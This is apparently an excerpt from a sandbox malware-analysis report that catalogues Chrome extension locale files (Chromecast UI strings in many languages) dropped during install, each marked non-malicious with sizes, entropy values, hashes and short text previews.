                                                                                                                                                                                                                        Size (bytes):15327
                                                                                                                                                                                                                        Entropy (8bit):5.221212691380602
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:0Yiepr1oh/Kd1sko8MrIpL72Izq8pXL2vVRmdKV6c8TEKdl:04r60Xo8MrIpLpRXL0G0V6uml
                                                                                                                                                                                                                        MD5:E9236F0B36764D22EEC86B717602241E
                                                                                                                                                                                                                        SHA1:DE82B804B18933907095DEF3F2EF164C1BB5F9B6
                                                                                                                                                                                                                        SHA-256:300F4F7C45EBE39EAAF40776C28D0A399A710699AAB58E9A8D43A6FD2DD00376
                                                                                                                                                                                                                        SHA-512:BB8A81D5D1C3FB3CA05149137852CAC213DEECB0437DA85472D5C03DAEFFE28D73007D7921740E56FE8B79544F529670600D47B86C4F27BF45C090B4D55F23F7
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": "Loopt vast".. },.. "1213957982723875920": {.. "message": "Welke beschrijving past het beste bij je netwerk?".. },.. "128276876460319075": {.. "message": "Apparaatdetectie".. },.. "1428448869078126731": {.. "message": "Vloeiendheid van de video".. },.. "1522140683318860351": {.. "message": "Kan geen verbinding maken. Probeer het opnieuw.".. },.. "1550904064710828958": {.. "message": "Vloeiend".. },.. "1636686747687494376": {.. "message": "Perfect".. },.. "1802762746589457177": {.. "message": "Volume".. },.. "1850397500312020388": {.. "message": "Zie je je Chromecast in de $START_LINK$Google Home app$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\pl\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15418
                                                                                                                                                                                                                        Entropy (8bit):5.346020722930065
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:PBUprktnFwP5GkzF0r2Q3SdIucDGGmPlTV6c8TEKdl:ur2CDur2kT9aGydV6uml
                                                                                                                                                                                                                        MD5:8254020C39A5F6C1716639CC530BB0D6
                                                                                                                                                                                                                        SHA1:A97A70427581ADA902CA73C898825F7B4B4FAC8F
                                                                                                                                                                                                                        SHA-256:2F4E4FC6AEB4A8E7F0E0DCE220D66E763F4EBF1FA79985834D636C6692FEA3E8
                                                                                                                                                                                                                        SHA-512:9A2CD0F061A943CE04789FF259ECE5B3CCA11EBB6C1DF16C703F70394A5F89415E8EFB79CFB4646FC07FD261170A74602644FFF02ABD38548895CDF7DAB68EB6
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": "Zatrzymuje si.".. },.. "1213957982723875920": {.. "message": "Kt.ra z tych opcji najlepiej opisuje Twoj. sie.?".. },.. "128276876460319075": {.. "message": "Wykrywanie urz.dze.".. },.. "1428448869078126731": {.. "message": "P.ynno.. obrazu".. },.. "1522140683318860351": {.. "message": "Nie uda.o si. nawi.za. po..czenia. Spr.buj ponownie.".. },.. "1550904064710828958": {.. "message": "P.ynna".. },.. "1636686747687494376": {.. "message": "Idealna".. },.. "1802762746589457177": {.. "message": "G.o.no..".. },.. "1850397500312020388": {.. "message": "Czy Chromecasta wida. w.$START_LINK$aplikacji Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\pt\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15475
                                                                                                                                                                                                                        Entropy (8bit):5.239856689212255
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:L9PpriI0RYHf8kfrvvI/99T+BEsV6c8TEKdl:LrkYPfrgsV6uml
                                                                                                                                                                                                                        MD5:FABD5D64267F0E6D7BE6983AB8704F8C
                                                                                                                                                                                                                        SHA1:D4DAAD0FF5C461C51E6C1FD22B86AFC5B13E123F
                                                                                                                                                                                                                        SHA-256:D82DCA262FF005668B252B478DEDAAC4A5C1E417AF9DE57C22F169A6680183AE
                                                                                                                                                                                                                        SHA-512:AD8B2129DCB4F232AEDD7A2B90AF2EFA43497F9118C27AB843D279F7B0EDF70AF95251B46C8098AA831FEC0B2AF6AB0308D3DCFD9AE87BEA8AD9E0D1032E0F8B
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": "Congela".. },.. "1213957982723875920": {.. "message": "Qual das seguintes alternativas melhor descreve sua rede?".. },.. "128276876460319075": {.. "message": "Detec..o de dispositivos".. },.. "1428448869078126731": {.. "message": "Suavidade da reprodu..o do v.deo".. },.. "1522140683318860351": {.. "message": "Falha na conex.o. Tente novamente.".. },.. "1550904064710828958": {.. "message": "Suave".. },.. "1636686747687494376": {.. "message": "Perfeita".. },.. "1802762746589457177": {.. "message": "Volume".. },.. "1850397500312020388": {.. "message": ". poss.vel encontrar seu Chromecast no $START_LINK$app Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\ro\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15655
                                                                                                                                                                                                                        Entropy (8bit):5.288239072087021
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:rpzpr34BALdvonekYFJr2RlYh7YU95cep3AnjYCV6c8TEKdl:HrIqLdv0VYFJrT95c8VCV6uml
                                                                                                                                                                                                                        MD5:75E16A8FB75A9A168CFF86388F190C99
                                                                                                                                                                                                                        SHA1:C27CE4C1DB3DF2D232925C73DC9AC1FA24DAD396
                                                                                                                                                                                                                        SHA-256:9C4716FF42A730F1E7725F0D9E703F311E79FDA31F85B4BB0B8863FC3C27AB9D
                                                                                                                                                                                                                        SHA-512:9E0BF56560B1D73F9706FF6AA2D5628CBE58EFCE197899A7EE686B2395D0FA2F9927538DD9B7B152CE2DED4708A210DA3DD6F5350E62AF853E809782997B1922
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": "Redare cu bloc.ri".. },.. "1213957982723875920": {.. "message": "Care dintre urm.toarele descrie cel mai bine re.eaua ta?".. },.. "128276876460319075": {.. "message": "Descoperirea dispozitivelor".. },.. "1428448869078126731": {.. "message": "Calitatea red.rii videoclipului".. },.. "1522140683318860351": {.. "message": "Conexiunea nu s-a stabilit. .ncerca.i din nou.".. },.. "1550904064710828958": {.. "message": "Redare lin.".. },.. "1636686747687494376": {.. "message": "Redare perfect.".. },.. "1802762746589457177": {.. "message": "Volum".. },.. "1850397500312020388": {.. "message": "Chromecastul dvs. apare .n $START_LINK$ aplica.ia Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\ru\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):17686
                                                                                                                                                                                                                        Entropy (8bit):5.471928545648783
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:Pu6PQpr19XtZkmVpFQkeVBSr/7Nq5k8TyIeBcrvV6c8TEKdl:ir7Q+LASrWk8CirvV6uml
                                                                                                                                                                                                                        MD5:8EF94823972EA8D2FC9BB7EC09AB1846
                                                                                                                                                                                                                        SHA1:4171DC9CE9D82FDA5A280517A1FE58C907D75CE3
                                                                                                                                                                                                                        SHA-256:1009DB9FFA64E411B31E0780EBA43B9C9F8B05B5AC8CCA9A38514650261ABB0A
                                                                                                                                                                                                                        SHA-512:83CEC6CF43F4A5A998B987DA6B6F236B36078C560F1CD79366AEBF2950ECD881F0B3ECC1C0769D911381B4A1D5901121E3620CA1AC2401BDE12642BE64EFD67A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": ".........".. },.. "1213957982723875920": {.. "message": "..... .. ......... .... ........ ............. ..... ....?".. },.. "128276876460319075": {.. "message": "........ . ............ .........".. },.. "1428448869078126731": {.. "message": "............... .....".. },.. "1522140683318860351": {.. "message": ".. ....... .......... ........... ......... ........".. },.. "1550904064710828958": {.. "message": "....... ...............".. },.. "1636686747687494376": {.. "message": "........".. },.. "1802762746589457177": {.. "message": ".........".. },.. "1850397500312020388": {.. "message": ".. ...... .... .......... Chromecast . $START_LINK$........
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\sk\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15740
                                                                                                                                                                                                                        Entropy (8bit):5.409596551150113
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:PIwprzrAXVZdrkF9PMZq6rTxnfKVSk7bVV6c8TEKdl:jrojd4F94q6rRsdVV6uml
                                                                                                                                                                                                                        MD5:C314FAC15AFF6A2EE9C732C64AB5A66D
                                                                                                                                                                                                                        SHA1:D51F3362B5FDD2F3756DE42D7D6227DC818C6344
                                                                                                                                                                                                                        SHA-256:8EE2A25A09D6D0F89063FAA34BA2BC4DB505DD31FE6D5064C5D6E1E153721484
                                                                                                                                                                                                                        SHA-512:C0387992BFD6D5EA7781A6A8112DDAF9759A3FCE0B0D954F024B4368EBAE132EB5FB6D59DE69F7C015E049339F6A170F1B41236E222D09FF41020F912E9DCD3C
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": "Zam.za".. },.. "1213957982723875920": {.. "message": "Ktor. z nasleduj.cich skuto.nost. najlep.ie popisuj. va.u sie.?".. },.. "128276876460319075": {.. "message": "Vyh.ad.vanie zariaden.".. },.. "1428448869078126731": {.. "message": "Plynulos. videa".. },.. "1522140683318860351": {.. "message": "Pripojenie zlyhalo. Sk.ste to znova.".. },.. "1550904064710828958": {.. "message": "Plynul.".. },.. "1636686747687494376": {.. "message": "V.born.".. },.. "1802762746589457177": {.. "message": "Hlasitos.".. },.. "1850397500312020388": {.. "message": "Vid.te svoj Chromecast v.$START_LINK$aplik.cii Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3"..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\sl\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15628
                                                                                                                                                                                                                        Entropy (8bit):5.292871661441512
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:Ppp0prwFOhNkcUw4kjkNOD7r31RdeYqakV6c8TEKdl:0rXjYwy4Xr34AkV6uml
                                                                                                                                                                                                                        MD5:F60AB4E9A79FD6F32909AFAC226446B3
                                                                                                                                                                                                                        SHA1:07C9E383D4488BEBE316CA86966FC728F55A2E32
                                                                                                                                                                                                                        SHA-256:CDE581E6E7CF0136B003B45549E3BBEE7B67B74ADD786A8D5607BFDAD1DE7B87
                                                                                                                                                                                                                        SHA-512:F6A7673A8EFDB7FF74D7B83DD4BCB3683031DB7FBFE6654F6311CBA53EC42F3E45CE2B42A6E385F868271BBDD348272ACF9CE304E2DB52A10B36D24C7B03114F
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": "Zamrzne".. },.. "1213957982723875920": {.. "message": "Kaj od tega najbolje opi.e va.e omre.je?".. },.. "128276876460319075": {.. "message": "Odkrivanje naprav".. },.. "1428448869078126731": {.. "message": "Teko.e predvajanje videoposnetka".. },.. "1522140683318860351": {.. "message": "Vzpostavitev povezave ni uspela. Poskusite znova.".. },.. "1550904064710828958": {.. "message": "Teko.e".. },.. "1636686747687494376": {.. "message": "Odli.no".. },.. "1802762746589457177": {.. "message": "Glasnost".. },.. "1850397500312020388": {.. "message": "Ali je Chromecast viden v $START_LINK$aplikaciji Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },.
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\sr\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):17769
                                                                                                                                                                                                                        Entropy (8bit):5.433657867664831
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:AtUpr9riVEviVutkeV74ErILfWloyWR5Roxj2V6c8TEKdl:AGr1pvtuWDrS9Sj2V6uml
                                                                                                                                                                                                                        MD5:4E233461D805CA7E54B0B394FFF42CAB
                                                                                                                                                                                                                        SHA1:77F30833FC73A4C02C652C9E5A6EAFE9C3988A30
                                                                                                                                                                                                                        SHA-256:E1E1C64213EBF2CFEB7BA83E51B697CEA449B3A8B279B1024B859228DE869879
                                                                                                                                                                                                                        SHA-512:7288B11E9F46CF8138E0F8305E5E43CCCCCAD75F2D37EB2515C6BD54064FDC511A5872F0A940FA44A0B1B2355D2E0AED12A0D53267AC501B4E5CB6DDE43B000D
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": "......... ..".. },.. "1213957982723875920": {.. "message": ".... .. ........ ...... ....... ....... .....?".. },.. "128276876460319075": {.. "message": "......... .......".. },.. "1428448869078126731": {.. "message": "........ ............ ..... ......".. },.. "1522140683318860351": {.. "message": ".......... .... ....... ........ .......".. },.. "1550904064710828958": {.. "message": "... .......".. },.. "1636686747687494376": {.. "message": ".......".. },.. "1802762746589457177": {.. "message": "...... .....".. },.. "1850397500312020388": {.. "message": "...... .. .. ...... Chromecast . $START_LINK$.......... Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\sv\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15135
                                                                                                                                                                                                                        Entropy (8bit):5.258962752997426
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:LY5pr2y3Lm3kONgMr6nxJNuyF5JTpg2NOV6c8TEKdl:Yr5DMrAfpOV6uml
                                                                                                                                                                                                                        MD5:897DAE6B0CF0FDE42648F0B47CB26E06
                                                                                                                                                                                                                        SHA1:E1F5F5F65AF34FF9484AB2B01E571EAF19BA23D0
                                                                                                                                                                                                                        SHA-256:52656C24F6F6D0F3B3FC01E9504C4D5CEB85624F1B22E974CA675DD0E94EB82D
                                                                                                                                                                                                                        SHA-512:399DEACFE61F4AF9B24AAA0357D30149CC49DA7825295933D3AE006714B5DE7AC5FCB9EC5340B0E3AB4ABF25641032BBBB5B7D578CD204F4EDEAFE6E08C55663
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": "Fastnar tillf.lligt".. },.. "1213957982723875920": {.. "message": "Vilket av f.ljande beskriver ditt n.tverk b.st?".. },.. "128276876460319075": {.. "message": "Enhetsidentifiering".. },.. "1428448869078126731": {.. "message": "J.mn videouppspelning".. },.. "1522140683318860351": {.. "message": "Det gick inte att ansluta. F.rs.k igen.".. },.. "1550904064710828958": {.. "message": "Flyter p.".. },.. "1636686747687494376": {.. "message": "Perfekt".. },.. "1802762746589457177": {.. "message": "Volym".. },.. "1850397500312020388": {.. "message": "Visas din Chromecast i $START_LINK$ Google Home-appen$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\sw\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15156
                                                                                                                                                                                                                        Entropy (8bit):5.216902945207334
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:6GprWbq4takN4kbvrwJAV5HeY9NVUpnV6c8TEKdl:nrol7rRkpnV6uml
                                                                                                                                                                                                                        MD5:EC233129047C1202D87DC140F7BA266D
                                                                                                                                                                                                                        SHA1:537E4C887428081365D028F32C53E3C92F29AAA6
                                                                                                                                                                                                                        SHA-256:28EDBC5C4858217811D45CAA215710E452C8926E4DE99F810001AD664D08BE0D
                                                                                                                                                                                                                        SHA-512:2E3F9BA1EA9EEF921E76B46B5EF2404B3B77B61F18CF67CC78C23C62202227F678A3DBE9C730E42A310800914DC53F25E8B2FBF461839DE33D3501B0BCB4EC8D
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": "Inasita kucheza".. },.. "1213957982723875920": {.. "message": "Ni gani kati ya zifuatazo inaelezea mtandao wako vizuri?".. },.. "128276876460319075": {.. "message": "Kupata Kifaa".. },.. "1428448869078126731": {.. "message": "Ulaini wa Kutiririsha Video".. },.. "1522140683318860351": {.. "message": "Imeshindwa kuunganisha. Tafadhali jaribu tena.".. },.. "1550904064710828958": {.. "message": "Laini".. },.. "1636686747687494376": {.. "message": "Bora".. },.. "1802762746589457177": {.. "message": "Sauti".. },.. "1850397500312020388": {.. "message": "Je, unaweza kuona Chromecast yako katika $START_LINK$ programu ya Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\ta\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):20531
                                                                                                                                                                                                                        Entropy (8bit):5.2537196877590056
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:I0N4prlczmbWIO0KISBZdMx4kLQ7rgEsZatRoFkJL+KJtjV6c8TEKdl:0r/TUrRVjV6uml
                                                                                                                                                                                                                        MD5:C50C5D2EDFC79DBDCBD5A58A027A3231
                                                                                                                                                                                                                        SHA1:14314D760A18C39F06CD072CF5843832AFB86689
                                                                                                                                                                                                                        SHA-256:EEB0E89D5AD92B80FF08F88533A111DB3416D7C3860C64227D1CC8B7C2B58298
                                                                                                                                                                                                                        SHA-512:A241084C44260C239CB8E6736AB7F7D1988142DDA6CAAD9F907FB42970BE56EC8DA6956BFBE97F926C6EFA32B750F1F57815980494BC31D27DF609C04421AD42
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": "....... .........".. },.. "1213957982723875920": {.. "message": "................ ... ...... .............. ...... ........ ...........?".. },.. "128276876460319075": {.. "message": "...... .............".. },.. "1428448869078126731": {.. "message": ".......... ..... .....".. },.. "1522140683318860351": {.. "message": "...... ............ ........ .........".. },.. "1550904064710828958": {.. "message": "..... ......".. },.. "1636686747687494376": {.. "message": "........".. },.. "1802762746589457177": {.. "message": "......."
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\te\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):20495
                                                                                                                                                                                                                        Entropy (8bit):5.301590673598541
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:hcFQcIrxhljbwSb4V6Icdbf1crfrCk0ODzB+relGZqsItV6uml:KcNbw4b2reSob26uml
                                                                                                                                                                                                                        MD5:F740F25488BE253FCF5355D5A7022CEE
                                                                                                                                                                                                                        SHA1:203A8DF19BA5A602A43DE18E99A6615D950C450E
                                                                                                                                                                                                                        SHA-256:5B9C96CB5D62510836B321EB9CEEF23865BB9D4DC4DE7716E90A858E00701FDF
                                                                                                                                                                                                                        SHA-512:3FB6E32D26EEAADB94D594A5B61930B003B4DA09C282A2ABF063A4502AA725FB88E4801F8A2443CD46137BEDAE5DFD2359DCA3506EE416713D08DF6430065725
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": "........".. },.. "1213957982723875920": {.. "message": "..... .......... ... .. ........... ....... ........ ............?".. },.. "128276876460319075": {.. "message": "..... ..... ....".. },.. "1428448869078126731": {.. "message": "...... ...... ......".. },.. "1522140683318860351": {.. "message": "........ .......... ...... ..... ..............".. },.. "1550904064710828958": {.. "message": ".......".. },.. "1636686747687494376": {.. "message": "......... ....".. },.. "1802762746589457177": {.. "message": "........".. },.. "185039750031202038
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\th\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):18849
                                                                                                                                                                                                                        Entropy (8bit):5.3815746250038305
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:GhjwMfr4c/ey18Ym7ZepIfa1hea0KEr2ucpYxcixh8V6uml:GhjwMfccGy18Ym7ZiIfa1hea0KEKucp2
                                                                                                                                                                                                                        MD5:9F926FCB8BAEA23453B99EA162CCDEA1
                                                                                                                                                                                                                        SHA1:04D1E45591C0435A39DCA00A81E83E68585E8B64
                                                                                                                                                                                                                        SHA-256:100463C587F549C964A4EB21EA38EA1B4ADEF11E927FAC8FF884623B77202C02
                                                                                                                                                                                                                        SHA-512:F226278DDF2D1995961690895361AB7B5D221C5E36D7767BBA71F36716C27B28210F85DC7DB4D2FC61B048FE2D058EE76EFBF2AD2A9714375149C4D09E18BE2B
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": "....".. },.. "1213957982723875920": {.. "message": ".............................................".. },.. "128276876460319075": {.. "message": "...............".. },.. "1428448869078126731": {.. "message": "....................".. },.. "1522140683318860351": {.. "message": "................... ...............".. },.. "1550904064710828958": {.. "message": ".......".. },.. "1636686747687494376": {.. "message": "..........".. },.. "1802762746589457177": {.. "message": "..........".. },.. "1850397500312020388": {.. "message": ".......... Chromecast ..... $
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\tr\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15542
                                                                                                                                                                                                                        Entropy (8bit):5.336342457334077
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:OGNSbprOWklwIc3uk+zwr5a+qF6LtP2nFjYqcV6c8TEKdl:wrfNV9r5avYqcV6uml
                                                                                                                                                                                                                        MD5:B0420F071E7C6C2DE11715A0BF026C63
                                                                                                                                                                                                                        SHA1:F41CC696786B18805DB8DC9E1E476146C0D6BE90
                                                                                                                                                                                                                        SHA-256:309F946F753DF6AF5C255D772EA0D429462152F78ABA4A96A2E369707A2C6B67
                                                                                                                                                                                                                        SHA-512:67B42FC962AB70FFF86777E5057047EF4CFFDA4BED040F9D45BB5DB0275C3B5F21B17924AE5C51C71E8B078AB88AE3001C70CDB4E1994D4C8A20DEFC3A1D34FA
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": "Donuyor".. },.. "1213957982723875920": {.. "message": "A..n.z. a.a..dakilerden hangisi en iyi .ekilde tan.mlar?".. },.. "128276876460319075": {.. "message": "Cihaz Bulma".. },.. "1428448869078126731": {.. "message": "Videonun D.zg.n Oynat.lmas.".. },.. "1522140683318860351": {.. "message": "Ba.lant. ba.ar.s.z oldu. L.tfen tekrar deneyin.".. },.. "1550904064710828958": {.. "message": "D.zg.n".. },.. "1636686747687494376": {.. "message": "M.kemmel".. },.. "1802762746589457177": {.. "message": "Ses d.zeyi".. },.. "1850397500312020388": {.. "message": "Chromecast'inizi $START_LINK$Google Home uygulamas.nda$END_LINK$ g.rebiliyor musunuz? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\uk\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):17539
                                                                                                                                                                                                                        Entropy (8bit):5.492873573147444
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:vDBprzaoaqEv390hrTr6hlRU62cdV6uml:/BaFNe76GYX6uml
                                                                                                                                                                                                                        MD5:FF06E78C06E8DFF4A422EA24F0AB3760
                                                                                                                                                                                                                        SHA1:A434D1CE22DE0D2FD1842E94F5815F7B1972D1EE
                                                                                                                                                                                                                        SHA-256:E209FDEF12CCEC03B4E0D5B9464F90D527E62C5BC4DD565C680661D7F282AB02
                                                                                                                                                                                                                        SHA-512:8EADCC918F51A946A68AAF4D9DD7F3894BE470FD0A0550E4160D609F30C78BD55508B3DF4D62A28C0813D83C5C10F9A7BFE656A4CF519E4CC814FFB07F1E9F3B
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": ".......".. },.. "1213957982723875920": {.. "message": ".. . ............ ..... ........ ...... .... ......?".. },.. "128276876460319075": {.. "message": "......... ........".. },.. "1428448869078126731": {.. "message": "......... ........... .....".. },.. "1522140683318860351": {.. "message": ".. ....... ............. ......... ........".. },.. "1550904064710828958": {.. "message": "...... ...........".. },.. "1636686747687494376": {.. "message": "......".. },.. "1802762746589457177": {.. "message": "........".. },.. "1850397500312020388": {.. "message": ".. ...... .. .... ........ Chromecast . $START_LINK$....... Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeho
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\vi\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16001
